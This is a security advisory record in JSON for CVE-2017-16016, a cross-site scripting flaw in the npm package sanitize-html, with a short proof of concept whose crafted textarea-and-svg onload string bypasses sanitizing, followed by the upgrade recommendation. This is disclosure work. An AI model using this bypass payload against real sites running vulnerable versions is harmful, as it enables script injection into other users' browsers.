{"id":"GHSA-xc6g-ggrc-qq4r","summary":"Cross-Site Scripting in sanitize-html","details":"Affected versions of `sanitize-html` are vulnerable to cross-site scripting when allowedTags includes at least one `nonTextTag`.\n\n## Proof of Concept\n\n```js\nvar sanitizeHtml = require('sanitize-html');\n\nvar dirty = '!\u003ctextarea\u003e&lt;/textarea&gt;\u003csvg/onload=prompt`xs`&gt;\u003c/textarea\u003e!';\nvar clean = sanitizeHtml(dirty, {\n    allowedTags: [ 'textarea' ]\n});\n\nconsole.log(clean);\n\n// !\u003ctextarea\u003e\u003c/textarea\u003e\u003csvg/onload=prompt`xs`\u003e\u003c/textarea\u003e!\n```\n\n\n## Recommendation\n\nUpdate to version 1.11.4 or later.","aliases":["CVE-2017-16016"],"modified":"2023-11-08T03:58:59.829428Z","published":"2018-11-09T17:47:23Z","database_specific":{"github_reviewed_at":"2020-06-16T22:02:52Z","nvd_published_at":null,"cwe_ids":["CWE-79"],"severity":"MODERATE","github_reviewed":true},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2017-16016"},{"type":"WEB","url":"https://github.com/punkave/sanitize-html/issues/100"},{"type":"WEB","url":"https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403"},{"type":"WEB","url":"https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403)))"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-xc6g-ggrc-qq4r"},{"type":"WEB","url":"https://npmjs.com/package/sanitize-html#discarding-the-entire-contents-of-a-disallowed-tag"},{"type":"WEB","url":"https://www.npmjs.com/advisories/154"}],"affected":[{"package":{"name":"sanitize-html","ecosystem":"npm","purl":"pkg:npm/sanitize-html"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.11.4"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-xc6g-ggrc-qq4r/GHSA-xc6g-ggrc-qq4r.json","last_known_affected_version_range":"\u003c= 1.11.1"}}],"schema_version":"1.9.0"}